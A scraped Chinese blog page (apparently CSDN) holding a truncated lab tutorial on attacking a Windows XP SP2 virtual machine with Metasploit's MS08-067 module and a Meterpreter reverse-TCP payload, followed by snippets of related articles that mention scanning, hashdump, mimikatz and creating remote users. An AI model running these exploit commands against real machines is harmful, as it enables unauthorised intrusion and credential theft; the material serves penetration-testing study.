Metasploit 攻击winXP

最新推荐文章于 2024-07-15 14:23:16 发布
最新推荐文章于 2024-07-15 14:23:16 发布
阅读量8.9k 收藏 16
点赞数 2
分类专栏: kali linux 文章标签: kali 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20480611/article/details/50470173
版权
本文通过Kali Linux使用Metasploit框架,详细介绍了如何针对Windows XP SP2进行渗透测试,包括选择exploit模块,设置目标IP,选择payload,启动reverse handler,以及在Meterpreter中获取shell。当遇到端口filtered情况时,建议检查靶机防火墙并重新扫描以确认漏洞。
摘要由CSDN通过智能技术生成

本次实验会用到以下资源:

Kali linux 镜像

windows XP SP2 镜像


进入kali linux进行渗透:

# msfconsole

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set RHOST TARGETIP

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms08_067_neta

最低0.47元/天 解锁文章
epsilon1
关注
专栏目录
Metasploit渗透测试实验报告
ling_xiao007的专栏
02-21 1万+
Metasploit渗透测试魔鬼训练营》一书采用独特的让读者成为虚拟渗透测试的主角的方式,经历一次对DVSSC公司网络的渗透测试任务。渗透测试的目标为DVSSC公司DMZ网段以及内网客户端主机。四个主机均存在严重漏洞缺陷,可执行不同方式的攻击方式。 信息搜集阶段获得了dvscc的域名注册信息、地理位置,以及DMZ网段操作系统版本、开放端口及其服务版本等信息,但域名注册信息存有疑问。 漏洞扫描阶段获得DMZ网段主机大量漏洞信息,可采取不同方式的攻击方式,如口令猜测、网络服务渗透攻击、浏览器渗
kali渗透windowsXP过程
dfdhxb995397的博客
05-23 1019
文章来源i春秋 这只是一个演示我自己搭建的环境,但是成功率非常高的,对方可以是其系统,首先我开启kali在打开kali终端输入nmap –sP 192.168.1.1/24 这里的ip是我的网关地址你可以输入自己的网关地址(生活中网关就是路由器地址)这段语句是扫描局域网内存活的主机如图 更多我之前做过的案例https://bbs.ichunqiu.com/thread-23056-1...
metasploit xp_sp3中文版系统rop修改
红领巾 的专栏
06-30 1098
之前用metasploit IE8进行试验的时,老发现不行
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
07-15 896
通过本篇文章,我们将会学习以下内容:1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux中使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令。
搭建kaliwin xp靶机实验环境
qq_63651088的博客
03-22 1065
kali官网下载(https://www.kali.org/get-kali/#kali-bare-metal )并安装64位镜像。安装kali虚拟机,选择graphical install,图形化界面,安装完成后,虚拟机——快照———拍摄快照1,命名安装完成。当本机连接互联网后,主机IP地址如下,虚拟机使用桥接模式后,虚拟机必须配置与主机在一个网段,才可联网通信。汉化教程,配置好汉化,注意这一步要联网,可使用手机散网。设置桥接模式:在虚拟机未开启之前,菜单栏:虚拟机---设置---网络适配器。
Metasploit之Msfvenom实战渗透自己电脑
怡红群芳的博客
04-05 447
Metasploit之Msfvenom实战渗透自己电脑
使用MSF 利用 ms08_067 对 XP 进行渗透
枫梓林のBlog
04-21 2269
利用 ms08_067 对 XP 进行渗透 文章目录利用 ms08_067 对 XP 进行渗透一、项目要求二、项目实施1. 实施目标2. 实施方案2.1 扫描该网段存活的主机2.2 使用nmap 判断目标主机IP地址2.3 使用 nessus 扫描该系统漏洞2.4 使用 MetasploitXP 进行渗透三、总结 一、项目要求 渗透到 XP系统 在系统中执行几条命令 二、项目实施 1. 实施目标 使用工具寻找目标内存活的主机 使用工具,判断其操作系统,及相关信息收集 扫描该系统的漏洞,进行复
Metasploit渗透测试实验报告.docx
05-17
1. **了解Metasploit框架**:熟悉Metasploit框架的基本概念与组成部分,能够掌握并应用该框架进行已知漏洞的渗透攻击。 2. **渗透测试流程**:通过实践掌握PTES标准渗透测试方法中的各个阶段(情报搜集、威胁建模、...
计算机系统安全_实验二_metasploit.doc
07-07
5. **实验环境**:实验在虚拟环境中进行,使用VMware 8.0,虚拟机包括WinXP(被渗透机)和Backtrack 4或5(渗透测试机)。虚拟机网络连接方式设置为NAT,确保两台虚拟机可以相互通信。 通过这个实验,学生可以深入...
kali:Nessus扫描漏洞并用msf利用攻击xp系统
qq_45747414的博客
11-23 5716
Nessus扫描漏洞 1.启动nessus服务 /bin/systemctl start nessusd.service 2.在浏览器打开https://192.168.50.128:8834/,登陆 3.进入开始扫描 在启动nessus过程中遇到的问题: NOTICE: Nessus has detected that API access on this scanner is disabled. 这里尝试了使用指令/opt/nessus/sbin/nessuscli update --all ##
kali渗透windowsXP过程__DNS欺骗
box
09-20 589
DNS欺骗
MSF初体验 - kali linux 入侵XP系统
weixin_30707875的博客
06-12 613
最近做某安全竞赛平台的比赛,真正开始接触Metasploit这一渗透神器,同时也是装逼神器(2333….),下面记录一下初步使用Metasploit的过程。首先在百度百科摘录了一段关于Metasploit Framework 的简要介绍。Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D...
网络安全 kali虚拟机中的渗透实验
weixin_46067990的博客
04-11 6019
使用工具:kali虚拟机 一台靶机(准备的WindowsXP靶机) 渗透实验过程 用kali攻击Windows的XP系统 1、 先扫描找漏洞(已经准备好了一个微软平台的08年的漏洞MS08.67) 2、 渗透成功之后,建立一个反弹的连接 3、 运用权限,远程建立一个用户 4、 留后门的工作暂时先不进行 5、 成功之后返回 ...
kali渗透XP
jqr999的博客
11-28 1453
kali ping 目标靶机XP + 靶机IP地址   使用:msfconsole     使用 search ms08_067   use exploit/windows/smb/ms08_067_netapi   show options   set RHOST 192.168.1.28   show options     show payloads ...
使用MetasploitWindowsXP渗透测试
panfengblog
11-17 1405
使用MetasploitWindowsXP渗透测试 哇,见识到了,渗透好猛 _ (大佬勿喷,我是菜鸡QAQ) 1. 破解用户口令 在我们使用漏洞渗透拿到windows的系统权限(system权限)时,就可以使用用hashdump或者scraper脚本获取用户口令hash辣~~ 可以通过hash碰撞的方式获得口令明文,或者直接使用mimikatz获得口令明文(当然是选择mimikatz更快鸭!) 2. 权限提升 参考博客:点我:-) 我们需要先拿到一个权限受限的shell鸭(比如使用ms10-0
演示使用Metasploit入侵Windows
weixin_34001430的博客
04-25 952
我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。 本文演示怎么使用Metasploit入侵windows xp sp3。 启动msfconsole: # msfconsole 选择一个漏洞: msf > search platform: windows xp sp3 ...
利用msfconsole渗透攻击windows 2000
weixin_41010318的博客
12-11 3016
1.利用Nessus扫描该windows 2000的机器,发现有些高危的漏洞 比如:MS03-026 / MS03-039: Buffer Overrun In RPCSS Service Could Allow Code Execution (823980 / 824146) 然后打开msfconsole msf > search ms03-026 Matching Module...
Metasploit网络渗透攻击技术解析
通过Armitage,用户可以更方便地管理多个Metasploit会话,执行复杂的攻击策略,以及进行多主机的渗透测试。 网络渗透攻击是一种高级的、系统性的攻击方式,区别于传统的单一漏洞利用。攻击者通常会采用多种技术和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值